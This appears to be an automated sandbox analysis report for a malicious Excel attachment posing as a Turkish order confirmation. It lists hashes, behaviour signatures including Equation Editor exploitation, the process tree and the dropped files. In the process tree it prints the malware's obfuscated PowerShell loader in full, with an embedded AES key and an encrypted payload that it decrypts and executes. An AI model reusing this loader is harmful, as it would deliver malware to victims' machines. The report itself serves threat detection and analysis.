Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    108s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    09/07/2024, 10:29

General

  • Target

    Sipariş onayı.xls

  • Size

    1.1MB

  • MD5

    94d52f7b132f459b88ba2b9c6ed076cb

  • SHA1

    6970a28538c35aa1c20b32a855e40c85842025d7

  • SHA256

    57b1e7f094836b89c613e86a12966702169ead968058ac24c738b891bb8fa01e

  • SHA512

    c8a18dab02481a7d226d9d3a71b38087e3406e089051995c1be66e49dcb5b715212ab3eb8a36fe7925a32cb79d6baa98ba0ed2cdb8ea5803d5c1e5fe80b8b594

  • SSDEEP

    24576:48q+k+xbyN3g3yBO128OA2BFzfOSr4hBBzcIPuV8rv4zBkS3QHVO:dq+k+yOUJvSSr4N4IzvT+QH

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Abuses OpenXML format to download file from external location 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Sipariş onayı.xls"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1432
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2152
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI30773578260699216772112657705967CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIQMf5B09cdBHkAi+7WX6Eim/0LQN2CVUEEynQsRZwEf+oX3ImFjPvUS61KgKvxRvbqbvV1BJjVdgJx56hZgwbiHtWmMltdNLbC+WPfe7eKX4Ft6t2mI6O58+EIo6eppVONGYZ4PiEan5OudS49/sjS50893i6Yhw5C3r48pNAHqUwb7IbeBoa9ry6Qdql8Of+qVQ3cJwZTrOp2UcyAou4IWVlmPqpX3XkMGABgkCfbyMN+Q6W06Kb2qhxKGZ90MI/5Lmo6aUU0pP3cgSwF9QFIo0TcHnGUkN9/Ibu7jDQF+k4GWMheDMEjsTiR25T7uIspS4GY79zjnTGg1D7yTPkE7fbEHYgqmJ14FKcPirsbSHMq4PnuKWeM1w6Os2/YujFcVFMl5JMJhfQ+WCpRTSv9UZ7ZOGhAynbAiDixJoNCrOpzMww6hrpICwpzKJykVqFrMdvgQ+RO/HsA1AZN/v+p9fQ6c6Kvx8xt7qgZmkDe1Jv4iTAlZOFrLQw1MWTYRr0Jj4qCe2CGH6mSTFuM4JfUHEQwLJj7aV7iniYAz070uEF+23PacsLacZN7GdSJGeuPFsxPmRFYw4SrRU/pgOAHdgkVvmsQRuELaz4j9qjzShIHysripsrsnboW4O34sIHJxxSK7BrcnsJ1GVRVAK+3neu/3JkQP3cfEtNUE/bUjkjGwKBZ6SRB3ffkI5dPi1OrATVfV22QLRqztCEoCIN4RQlmeESX1aZ9hhJ20dXXFh6OBPOVejKKEwLndSBIgx43T/RSJuYlpFYYV0nl8P2P0MF4L2UxNfUQ0y7uCAfH8mc1gOKrnVDsqlNBgxWXr/q12k/j7D5cxSl541IT/L6XsiRd3ohNAija/0XPRjiWymjPn9OENUmtc992I2iVIUZ8X93NM+ngBaZe5Nw/AhoaXr5U6DyvuoOvOtRPlYJbyZ7SB7NjxcSpoYbbmqBLRQVYMJilsPwG4Z1GK88B4LpQx/Kqt43EObh8tebhR2PZQsE5tJ/bgMgz6RjuM5alTeJseu4RdgYmQVn9TxzEfUxSANgHJU4vLl2oNtuIPkPtB+RUqwFo+ur+yATstDWzKzm3rl0a2uQyoT8GrMg9LaD+GWvqdFqiz3x9AWLSHqEQ0Qb1a/Ain8Eu3jLPXM6hZ1V7jBdBjJ6tz1CtW6Iz/RDtYcrLFqpIFMwDDJo+MZZoRwFOUPPGfPmHfLpq1XpjMC06L7Vc0vo7xY+oDLcsFDCYkwWCH469PdG2GLSWEXzwy8fvH74rIP8vyTnSRTgz7PU44zK7FRY7qVKW7n7GLCA0H6LbQ+39HckA9WL4uSsUME9GUPdjgLUsEV2jNpd0wTHtsOmB2iy1NE3ypGj5KZqsaSckxBgYX/yHiNgQcsG4mZ6eKpHQ3pA6iGchpeFlY/QveaoGWyqbHZmnQqxSPt0ns/vDUSi3wTAekaWWSJaeZtpxAj7+MK+PzGMr7A+ZRnYCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

      Filesize

      1KB

      MD5

      b5cb610c294a6618c6043081054508f0

      SHA1

      5751c85ee092b7c30c93b1f1ea2baf890bd99d4a

      SHA256

      8040a50a5ab1e6859d1ae14b1a9f84cf0fc328a0d9face70ec27ac8e6abe8cef

      SHA512

      314a5c9e63275ab2d41b445f5b4cf1b9d17c06652c63ce44c0d7a25cc912a836bba7018e7d6efdbd7fb8350337f486cb56f463009cb52cf67fda28507bc2bf87

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

      Filesize

      724B

      MD5

      8202a1cd02e7d69597995cabbe881a12

      SHA1

      8858d9d934b7aa9330ee73de6c476acf19929ff6

      SHA256

      58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

      SHA512

      97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

      Filesize

      410B

      MD5

      645287664cbf1bc468e7d792eeb91e44

      SHA1

      a9f051d26930077fdc1593b3e9defb4018ab8314

      SHA256

      5a58ced63147ff319d95e6fb03da5077b737bdc219a6697e15502cc4b908ee87

      SHA512

      6d74329f303391aaf4a3535aec6b58478eb3fa636df2bbc5a5a15f52884d876414cc2ca63c550ffb9159a5118c5acf4795926d7bee5fbef5ef8af33e961a0d72

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      e3301f0853adeb75c893792da959935b

      SHA1

      05587c0bbe8a4e388afcf097c65931b263a2fd44

      SHA256

      2977d3fed2f10eb99576eef6172867663561f9e62516838ab8e3ae0d2d7cb144

      SHA512

      dfc77656593462ed605c51953a9de4db81916025be517ec53c686c26d209e346a2b623ba1c1f0f1dbcf2852aff06979bb30e2bb3c215669a231b067f040a8e9b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

      Filesize

      392B

      MD5

      6beae66f4c7c60c38ba3cb7650e4f8ed

      SHA1

      af297fae77232f11ebfc2103caa783170fa66750

      SHA256

      1964474829f3b1dcf31249e0adb388f8f06f2468d2f825ab239616e336a6eb0d

      SHA512

      449662dbe1b0ceaabdb7f4036849c2e1411e26e4c969de9d54ee1694038609ef423c853a7a7ec65f8791c40098a5eb58357e1be6d594025585a43d817a2e1a26

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{DA5DC326-69A9-4506-A8A0-5FC5539941CB}.FSD

      Filesize

      128KB

      MD5

      54cff9032647ed7e4a770eaa8ed9dc0e

      SHA1

      ba636fa3895b60ebaf57ed2dc5e0ee803115cfd0

      SHA256

      c799b5487e951f3836547eaed081cface25c284fe01e7572d4332670b36415f3

      SHA512

      0a94005aeeb8937f34d617c3ea4e358e6f4c0f9a60e493098877ea7cfe4071c403373ebe38c68d892a67853b829b50e3f2df21d7c3b3dab2fb0e6c27cf8d44a9

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      5b444cbdbc52eb352f3996d84239e829

      SHA1

      23a41f708656128d84d8215bf9f2a8b4835f6da3

      SHA256

      1a10e1bdf84928d541d19dfadaf1d7a3132a96f5ec187cef8e3994f2d06d6800

      SHA512

      1bdaab0c25075427c151cfa56815ee7167ec0e8111eac4a7d9d5a677ad80d4578fd187730f69da5580df2dc597129c1c3de887d98c0f8fb0e36ed53a30dc5d86

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0E0C29EE-CC79-40E3-90D8-8449C14BFAA7}.FSD

      Filesize

      128KB

      MD5

      dac4f1cd0ecfe0f288818907d4e2f319

      SHA1

      86d37ff9226d6c173fc64b7f9148b876f42d8309

      SHA256

      e948cd52bb462831e90bb0e7a0665e4bbc7b2498a7de071c51e746f8a67dd9a8

      SHA512

      5f8bb95e6e8c006ea45f6f2f53b2186ef1f075e8951a9f38e92cec6a161fbe55de0de27d589d89873234a38bc0ec684a6a61e6104a56bf3275bb45f49dd18c55

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GLOK2QLQ\paste1[1].txt

      Filesize

      156B

      MD5

      ad6c37ef980373e9bcbd14810fad34bc

      SHA1

      9c061a1b3608b7c7f1db7cd06c8246913ee11bda

      SHA256

      ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

      SHA512

      30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J8I3CVQY\we.we.we.we.wee[1].doc

      Filesize

      221KB

      MD5

      dec81947f9c288a6337b7eb4b8dec580

      SHA1

      587afe240a9013b8a6fd0d2a574f2ce814fd40b3

      SHA256

      008c8d4399750dba2733ce354ec97453535e8f00d293368a46c6e5514ebde20f

      SHA512

      ca82e253009b29a6f2ad7143818c0a4209c56d3bb1aa01f70532a6a1c111399c3acf5b791cb4913fe94430013a0b7b377fb7f4ed65a60d14e60f7fa216006bbc

    • C:\Users\Admin\AppData\Local\Temp\CabF519.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar1A7.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Local\Temp\{11355A20-CB24-428C-9835-1B787A3A601C}

      Filesize

      128KB

      MD5

      fc7a9031da9cf43d5bfca3d9e1fe8004

      SHA1

      ae1b787bff629f2d41bacf916da123ec7ad1cfea

      SHA256

      3675add65bd995635aadc302dbafdf1894a981eda03c0b5ade57331c84d2930e

      SHA512

      6df6b6742dc1eeda62e2dfcda71ab0de265790abf92ac48c39156999233e36d634fe4e51ec28690c6b19ed1c5f6608e416d97fc4863e3b4c18edfd405b5e81d8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      281B

      MD5

      662f5093d14856818bc3e742feb4235d

      SHA1

      58d23d8ef269f770e03dafd08ba58d805f3f4c2d

      SHA256

      92a056bff710e3ee5a7a836d42f470c5c289375cf8a577de83d7854d41c36fc2

      SHA512

      358a1fd49519846f042d7715604410efa571813795fc73464fc88ea2bc81a18bc91d50890752f7fc11376cd0794f8a7e997288a50bd96ea0a5440c968178056b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\KWPW6DW2.txt

      Filesize

      819B

      MD5

      9198d5f29a3e66eab0e4a70204f5b863

      SHA1

      6427b29a7e71153091fd4826b2e471903556fa6a

      SHA256

      eee57b4b4543d5b6c0bdc0c8c2487f9db03664dde3c64743553ea09a0dc4c61d

      SHA512

      074b619b8f981a5309adbb3de8cd460d80a49931469e491158de37985a2f9d0f70231e7614ae2bbd0d58c03e86d7a76864c31d29dba14a1a93446d49e390343e

    • C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS

      Filesize

      149KB

      MD5

      20765ae510b61f59e546c0b712a00009

      SHA1

      feccf03d61bbb21c258f772014d75a5bec2b11ad

      SHA256

      52caa19680e0ec9056836273759dc72e982c8ea03bd48a8c888a6b7acf193a35

      SHA512

      805753a168b4c1942b8b10b3d06a82df0c308f65c9a5c04504bee9bd1da2d80bef87e2a6ead758ab90873918c944208b6af96583e6dffc1c5c591d57a4fa2cb0

    • memory/1432-1-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/1432-26-0x0000000002450000-0x0000000002452000-memory.dmp

      Filesize

      8KB

    • memory/1432-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1432-142-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/2780-25-0x0000000003FB0000-0x0000000003FB2000-memory.dmp

      Filesize

      8KB

    • memory/2780-23-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/2780-21-0x000000002F391000-0x000000002F392000-memory.dmp

      Filesize

      4KB

    • memory/2780-143-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/2780-157-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2780-158-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB